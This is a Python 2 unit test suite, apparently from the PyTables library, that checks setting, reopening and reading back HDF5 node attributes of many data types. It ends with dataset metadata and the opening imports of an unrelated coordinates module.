close = False
nodeCacheSlots = 0
class NoCacheCloseCreate(CreateTestCase):
close = True
nodeCacheSlots = 0
class DictCacheNotCloseCreate(CreateTestCase):
close = False
nodeCacheSlots = -NODE_CACHE_SLOTS
class DictCacheCloseCreate(CreateTestCase):
close = True
nodeCacheSlots = -NODE_CACHE_SLOTS
class TypesTestCase(unittest.TestCase):
def setUp(self):
# Create an instance of HDF5 Table
self.file = tempfile.mktemp(".h5")
self.fileh = openFile(self.file, mode = "w")
self.root = self.fileh.root
# Create an array object
self.array = self.fileh.createArray(self.root, 'anarray',
[1], "Array title")
# Create a group object
self.group = self.fileh.createGroup(self.root, 'agroup',
"Group title")
def tearDown(self):
self.fileh.close()
os.remove(self.file)
common.cleanup(self)
#---------------------------------------
def test00a_setBoolAttributes(self):
"""Checking setting Bool attributes (scalar, Python case)"""
self.array.attrs.pq = True
self.array.attrs.qr = False
self.array.attrs.rs = True
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertEqual(self.root.anarray.attrs.pq, True)
self.assertEqual(self.root.anarray.attrs.qr, False)
self.assertEqual(self.root.anarray.attrs.rs, True)
def test00b_setBoolAttributes(self):
"""Checking setting Bool attributes (scalar, NumPy case)"""
self.array.attrs.pq = numpy.bool_(True)
self.array.attrs.qr = numpy.bool_(False)
self.array.attrs.rs = numpy.bool_(True)
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.bool_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.bool_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.bool_))
self.assertEqual(self.root.anarray.attrs.pq, True)
self.assertEqual(self.root.anarray.attrs.qr, False)
self.assertEqual(self.root.anarray.attrs.rs, True)
def test00c_setBoolAttributes(self):
"""Checking setting Bool attributes (NumPy, 0-dim case)"""
self.array.attrs.pq = numpy.array(True)
self.array.attrs.qr = numpy.array(False)
self.array.attrs.rs = numpy.array(True)
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertEqual(self.root.anarray.attrs.pq, True)
self.assertEqual(self.root.anarray.attrs.qr, False)
self.assertEqual(self.root.anarray.attrs.rs, True)
def test00d_setBoolAttributes(self):
"""Checking setting Bool attributes (NumPy, multidim case)"""
self.array.attrs.pq = numpy.array([True])
self.array.attrs.qr = numpy.array([[False]])
self.array.attrs.rs = numpy.array([[True, False],[True, False]])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq, numpy.array([True]))
assert_array_equal(self.root.anarray.attrs.qr, numpy.array([[False]]))
assert_array_equal(self.root.anarray.attrs.rs,
numpy.array([[True, False],[True, False]]))
def test01a_setIntAttributes(self):
"""Checking setting Int attributes (scalar, Python case)"""
self.array.attrs.pq = 1
self.array.attrs.qr = 2
self.array.attrs.rs = 3
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.int_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.int_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.int_))
self.assertEqual(self.root.anarray.attrs.pq, 1)
self.assertEqual(self.root.anarray.attrs.qr, 2)
self.assertEqual(self.root.anarray.attrs.rs, 3)
def test01b_setIntAttributes(self):
"""Checking setting Int attributes (scalar, NumPy case)"""
# 'UInt64' not supported on Win
checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
'UInt8', 'UInt16', 'UInt32']
for dtype in checktypes:
setattr(self.array.attrs, dtype, numpy.array(1, dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array(1, dtype=dtype))
def test01c_setIntAttributes(self):
"""Checking setting Int attributes (unidimensional NumPy case)"""
# 'UInt64' not supported on Win
checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
'UInt8', 'UInt16', 'UInt32']
for dtype in checktypes:
setattr(self.array.attrs, dtype, numpy.array([1,2], dtype=dtype))
# Check the results
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
if common.verbose:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([1,2], dtype=dtype))
def test01d_setIntAttributes(self):
"""Checking setting Int attributes (unidimensional, non-contiguous)"""
# 'UInt64' not supported on Win
checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
'UInt8', 'UInt16', 'UInt32']
for dtype in checktypes:
arr = numpy.array([1,2,3,4], dtype=dtype)[::2]
setattr(self.array.attrs, dtype, arr)
# Check the results
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
arr = numpy.array([1,2,3,4], dtype=dtype)[::2]
if common.verbose:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
assert_array_equal(getattr(self.array.attrs, dtype), arr)
def test01e_setIntAttributes(self):
"""Checking setting Int attributes (bidimensional NumPy case)"""
# 'UInt64' not supported on Win
checktypes = ['Int8', 'Int16', 'Int32', 'Int64',
'UInt8', 'UInt16', 'UInt32']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array([[1,2],[2,3]], dtype=dtype))
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
# Check the results
for dtype in checktypes:
if common.verbose:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([[1,2],[2,3]], dtype=dtype))
def test02a_setFloatAttributes(self):
"""Checking setting Float (double) attributes"""
# Set some attrs
self.array.attrs.pq = 1.0
self.array.attrs.qr = 2.0
self.array.attrs.rs = 3.0
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.float_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.float_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.float_))
self.assertTrue(self.root.anarray.attrs.pq, 1.0)
self.assertTrue(self.root.anarray.attrs.qr, 2.0)
self.assertTrue(self.root.anarray.attrs.rs, 3.0)
def test02b_setFloatAttributes(self):
"""Checking setting Float attributes (scalar, NumPy case)"""
checktypes = ['Float32', 'Float64']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array(1.1, dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
#assert getattr(self.array.attrs, dtype) == 1.1
# In order to make Float32 tests pass. This is legal, not a trick.
assert_almost_equal(getattr(self.array.attrs, dtype), 1.1)
def test02c_setFloatAttributes(self):
"""Checking setting Float attributes (unidimensional NumPy case)"""
checktypes = ['Float32', 'Float64']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array([1.1,2.1], dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([1.1,2.1], dtype=dtype))
def test02d_setFloatAttributes(self):
"""Checking setting Float attributes (unidimensional, non-contiguous)"""
checktypes = ['Float32', 'Float64']
for dtype in checktypes:
arr = numpy.array([1.1,2.1,3.1,4.1], dtype=dtype)[1::2]
setattr(self.array.attrs, dtype, arr)
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
arr = numpy.array([1.1,2.1,3.1,4.1], dtype=dtype)[1::2]
assert_array_equal(getattr(self.array.attrs, dtype), arr)
def test02e_setFloatAttributes(self):
"""Checking setting Int attributes (bidimensional NumPy case)"""
checktypes = ['Float32', 'Float64']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
def test03_setObjectAttributes(self):
"""Checking setting Object attributes"""
# Set some attrs
self.array.attrs.pq = [1.0, 2]
self.array.attrs.qr = (1,2)
self.array.attrs.rs = {"ddf":32.1, "dsd":1}
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertEqual(self.root.anarray.attrs.pq, [1.0, 2])
self.assertEqual(self.root.anarray.attrs.qr, (1,2))
self.assertEqual(self.root.anarray.attrs.rs, {"ddf":32.1, "dsd":1})
def test04a_setStringAttributes(self):
"""Checking setting string attributes (scalar case)"""
self.array.attrs.pq = 'foo'
self.array.attrs.qr = 'bar'
self.array.attrs.rs = 'baz'
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.string_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.string_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.string_))
self.assertEqual(self.root.anarray.attrs.pq, 'foo')
self.assertEqual(self.root.anarray.attrs.qr, 'bar')
self.assertEqual(self.root.anarray.attrs.rs, 'baz')
def test04b_setStringAttributes(self):
"""Checking setting string attributes (unidimensional 1-elem case)"""
self.array.attrs.pq = numpy.array(['foo'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array(['foo']))
def test04c_setStringAttributes(self):
"""Checking setting string attributes (empty unidimensional 1-elem case)"""
self.array.attrs.pq = numpy.array([''])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
if common.verbose:
print "pq -->", self.array.attrs.pq
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array(['']))
def test04d_setStringAttributes(self):
"""Checking setting string attributes (unidimensional 2-elem case)"""
self.array.attrs.pq = numpy.array(['foo', 'bar3'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array(['foo', 'bar3']))
def test04e_setStringAttributes(self):
"""Checking setting string attributes (empty unidimensional 2-elem case)"""
self.array.attrs.pq = numpy.array(['', ''])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array(['', '']))
def test04f_setStringAttributes(self):
"""Checking setting string attributes (bidimensional 4-elem case)"""
self.array.attrs.pq = numpy.array([['foo', 'foo2'],
['foo3', 'foo4']])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.root.anarray.attrs.pq,
numpy.array([['foo', 'foo2'],
['foo3', 'foo4']]))
def test05a_setComplexAttributes(self):
"""Checking setting Complex (python) attributes"""
# Set some attrs
self.array.attrs.pq = 1.0+2j
self.array.attrs.qr = 2.0+3j
self.array.attrs.rs = 3.0+4j
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.complex_))
self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.complex_))
self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.complex_))
self.assertEqual(self.root.anarray.attrs.pq, 1.0+2j)
self.assertEqual(self.root.anarray.attrs.qr, 2.0+3j)
self.assertEqual(self.root.anarray.attrs.rs, 3.0+4j)
def test05b_setComplexAttributes(self):
"""Checking setting Complex attributes (scalar, NumPy case)"""
checktypes = ['complex64', 'complex128']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array(1.1+2j, dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
#assert getattr(self.array.attrs, dtype) == 1.1+2j
# In order to make Complex32 tests pass.
assert_almost_equal(getattr(self.array.attrs, dtype), 1.1+2j)
def test05c_setComplexAttributes(self):
"""Checking setting Complex attributes (unidimensional NumPy case)"""
checktypes = ['Complex32', 'Complex64']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array([1.1,2.1], dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([1.1,2.1], dtype=dtype))
def test05d_setComplexAttributes(self):
"""Checking setting Int attributes (bidimensional NumPy case)"""
checktypes = ['Complex32', 'Complex64']
for dtype in checktypes:
setattr(self.array.attrs, dtype,
numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
# Check the results
if common.verbose:
for dtype in checktypes:
print "type, value-->", dtype, getattr(self.array.attrs, dtype)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
for dtype in checktypes:
assert_array_equal(getattr(self.array.attrs, dtype),
numpy.array([[1.1,2.1],[2.1,3.1]], dtype=dtype))
def test06a_setUnicodeAttributes(self):
"""Checking setting unicode attributes (scalar case)"""
self.array.attrs.pq = u'para\u0140lel'
self.array.attrs.qr = u'' # check #213
self.array.attrs.rs = u'baz'
# Check the results
if common.verbose:
if sys.platform != 'win32':
# It seems that Windows cannot print this
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.array.attrs.pq, numpy.unicode_))
self.assertTrue(isinstance(self.array.attrs.qr, numpy.unicode_))
self.assertTrue(isinstance(self.array.attrs.rs, numpy.unicode_))
self.assertEqual(self.array.attrs.pq, u'para\u0140lel')
self.assertEqual(self.array.attrs.qr, u'')
self.assertEqual(self.array.attrs.rs, u'baz')
def test06b_setUnicodeAttributes(self):
"""Checking setting unicode attributes (unidimensional 1-elem case)"""
self.array.attrs.pq = numpy.array([u'para\u0140lel'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.array.attrs.pq,
numpy.array([u'para\u0140lel']))
def test06c_setUnicodeAttributes(self):
"""Checking setting unicode attributes (empty unidimensional 1-elem case)"""
# The next raises a `TypeError` when unpickled. See:
# http://projects.scipy.org/numpy/ticket/1037
#self.array.attrs.pq = numpy.array([u''])
self.array.attrs.pq = numpy.array([u''], dtype="U1")
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
if common.verbose:
print "pq -->", `self.array.attrs.pq`
assert_array_equal(self.array.attrs.pq,
numpy.array([u''], dtype="U1"))
def test06d_setUnicodeAttributes(self):
"""Checking setting unicode attributes (unidimensional 2-elem case)"""
self.array.attrs.pq = numpy.array([u'para\u0140lel', u'bar3'])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.array.attrs.pq,
numpy.array([u'para\u0140lel', u'bar3']))
def test06e_setUnicodeAttributes(self):
"""Checking setting unicode attributes (empty unidimensional 2-elem case)"""
self.array.attrs.pq = numpy.array(['', ''], dtype="U1")
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.array.attrs.pq,
numpy.array(['', ''], dtype="U1"))
def test06f_setUnicodeAttributes(self):
"""Checking setting unicode attributes (bidimensional 4-elem case)"""
self.array.attrs.pq = numpy.array([[u'para\u0140lel', 'foo2'],
['foo3', u'para\u0140lel4']])
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
assert_array_equal(self.array.attrs.pq,
numpy.array([[u'para\u0140lel', 'foo2'],
['foo3', u'para\u0140lel4']]))
def test07a_setRecArrayAttributes(self):
"""Checking setting RecArray (NumPy) attributes"""
dt = numpy.dtype('i4,f8')
# Set some attrs
self.array.attrs.pq = numpy.zeros(2, dt)
self.array.attrs.qr = numpy.ones((2,2), dt)
self.array.attrs.rs = numpy.array([(1,2.)], dt)
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
assert_array_equal(self.array.attrs.rs, numpy.array([(1,2.)], dt))
def test07b_setRecArrayAttributes(self):
"""Checking setting nested RecArray (NumPy) attributes"""
# Build a nested dtype
dt = numpy.dtype([('f1', [('f1', 'i2'), ('f2', 'f8')])])
# Set some attrs
self.array.attrs.pq = numpy.zeros(2, dt)
self.array.attrs.qr = numpy.ones((2,2), dt)
self.array.attrs.rs = numpy.array([((1,2.),)], dt)
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
assert_array_equal(self.array.attrs.rs, numpy.array([((1,2),)], dt))
def test07c_setRecArrayAttributes(self):
"""Checking setting multidim nested RecArray (NumPy) attributes"""
# Build a nested dtype
dt = numpy.dtype([('f1', [('f1', 'i2', (2,)), ('f2', 'f8')])])
# Set some attrs
self.array.attrs.pq = numpy.zeros(2, dt)
self.array.attrs.qr = numpy.ones((2,2), dt)
self.array.attrs.rs = numpy.array([(([1,3],2.),)], dt)
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertTrue(isinstance(self.array.attrs.pq, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.qr, numpy.ndarray))
self.assertTrue(isinstance(self.array.attrs.rs, numpy.ndarray))
assert_array_equal(self.array.attrs.pq, numpy.zeros(2, dt))
assert_array_equal(self.array.attrs.qr, numpy.ones((2,2), dt))
assert_array_equal(self.array.attrs.rs, numpy.array([(([1,3],2),)], dt))
class NotCloseTypesTestCase(TypesTestCase):
close = 0
class CloseTypesTestCase(TypesTestCase):
close = 1
class NoSysAttrsTestCase(unittest.TestCase):
def setUp(self):
# Create an instance of HDF5 Table
self.file = tempfile.mktemp(".h5")
self.fileh = openFile(
self.file, mode = "w", PYTABLES_SYS_ATTRS=False)
self.root = self.fileh.root
# Create a table object
self.table = self.fileh.createTable(self.root, 'atable',
Record, "Table title")
# Create an array object
self.array = self.fileh.createArray(self.root, 'anarray',
[1], "Array title")
# Create a group object
self.group = self.fileh.createGroup(self.root, 'agroup',
"Group title")
def tearDown(self):
self.fileh.close()
os.remove(self.file)
common.cleanup(self)
def test00_listAttributes(self):
"""Checking listing attributes (no system attrs version)."""
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
if common.verbose:
print "Attribute list:", self.group._v_attrs._f_list()
# Now, try with a Table object
self.table.attrs.a = "1"
self.table.attrs.c = "2"
self.table.attrs.b = "3"
if common.verbose:
print "Attribute list:", self.table.attrs._f_list()
# Finally, try with an Array object
self.array.attrs.k = "1"
self.array.attrs.j = "2"
self.array.attrs.i = "3"
if common.verbose:
print "Attribute list:", self.array.attrs._f_list()
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+")
self.root = self.fileh.root
agroup = self.root.agroup
self.assertEqual(agroup._v_attrs._f_list("user"), ["pq", "qr", "rs"])
self.assertEqual(agroup._v_attrs._f_list("sys"), [])
self.assertEqual(agroup._v_attrs._f_list("all"), ["pq", "qr", "rs"])
atable = self.root.atable
self.assertEqual(atable.attrs._f_list(), ["a", "b", "c"])
self.assertEqual(atable.attrs._f_list("sys"), [])
self.assertEqual(atable.attrs._f_list("all"), ["a", "b", "c"])
anarray = self.root.anarray
self.assertEqual(anarray.attrs._f_list(), ["i", "j", "k"])
self.assertEqual(anarray.attrs._f_list("sys"), [])
self.assertEqual(anarray.attrs._f_list("all"), ["i", "j", "k"])
class NoSysAttrsNotClose(NoSysAttrsTestCase):
close = False
class NoSysAttrsClose(NoSysAttrsTestCase):
close = True
class SegFaultPythonTestCase(common.TempFileMixin, common.PyTablesTestCase):
def test00_segfault(self):
"""Checking workaround for Python unpickle problem (see #253)."""
self.h5file.root._v_attrs.trouble1 = "0"
self.assertEqual(self.h5file.root._v_attrs.trouble1, "0")
self.h5file.root._v_attrs.trouble2 = "0."
self.assertEqual(self.h5file.root._v_attrs.trouble2, "0.")
# Problem happens after reopening
self._reopen()
self.assertEqual(self.h5file.root._v_attrs.trouble1, "0")
self.assertEqual(self.h5file.root._v_attrs.trouble2, "0.")
if common.verbose:
print "Great! '0' and '0.' values can be safely retrieved."
class UnsupportedAttrTypeTestCase(PyTablesTestCase):
def test00_unsupportedType(self):
"""Checking file with unsupported type."""
filename = self._testFilename('attr-u16.h5')
fileh = openFile(filename)
self.failUnlessWarns(DataTypeWarning, repr, fileh)
fileh.close()
# Test for specific system attributes in EArray
class SpecificAttrsTestCase(common.TempFileMixin, common.PyTablesTestCase):
def test00_earray(self):
"Testing EArray specific attrs (create)."
ea = self.h5file.createEArray('/', 'ea', Int32Atom(), (2,0,4))
if common.verbose:
print "EXTDIM-->", ea.attrs.EXTDIM
self.assertEqual(ea.attrs.EXTDIM, 1)
def test01_earray(self):
"Testing EArray specific attrs (open)."
ea = self.h5file.createEArray('/', 'ea', Int32Atom(), (0,1,4))
self._reopen('r')
ea = self.h5file.root.ea
if common.verbose:
print "EXTDIM-->", ea.attrs.EXTDIM
self.assertEqual(ea.attrs.EXTDIM, 0)
#----------------------------------------------------------------------
def suite():
theSuite = unittest.TestSuite()
niter = 1
for i in range(niter):
theSuite.addTest(unittest.makeSuite(NotCloseCreate))
theSuite.addTest(unittest.makeSuite(CloseCreate))
theSuite.addTest(unittest.makeSuite(NoCacheNotCloseCreate))
theSuite.addTest(unittest.makeSuite(NoCacheCloseCreate))
theSuite.addTest(unittest.makeSuite(DictCacheNotCloseCreate))
theSuite.addTest(unittest.makeSuite(DictCacheCloseCreate))
theSuite.addTest(unittest.makeSuite(NotCloseTypesTestCase))
theSuite.addTest(unittest.makeSuite(CloseTypesTestCase))
theSuite.addTest(unittest.makeSuite(NoSysAttrsNotClose))
theSuite.addTest(unittest.makeSuite(NoSysAttrsClose))
theSuite.addTest(unittest.makeSuite(SegFaultPythonTestCase))
theSuite.addTest(unittest.makeSuite(UnsupportedAttrTypeTestCase))
theSuite.addTest(unittest.makeSuite(SpecificAttrsTestCase))
return theSuite
if __name__ == '__main__':
unittest.main( defaultTest='suite' )
| 37.130273 | 84 | 0.571791 |
cbe3c90697a8da3be7194240451dcd5c6f1ceea3 | 40,450 | py | Python | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | 3 | 2019-09-03T21:08:01.000Z | 2021-05-22T18:41:12.000Z | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | null | null | null | pynetstim/coordinates.py | EhsanTadayon/pynetstim | 775ff19a1f1a83d23218fee016a9e1bad5cc164f | [
"MIT"
] | 2 | 2020-02-28T15:59:56.000Z | 2021-02-11T21:07:37.000Z | """
classes to work with coordinates in native, freesurfer and MNI space
"""
import nibabel as nib
import numpy as np
import os
import nipype.pipeline.engine as pe
from nipype import Node, Workflow
from nipype.interfaces.fsl import WarpPoints, Reorient2Std, FLIRT,FNIRT
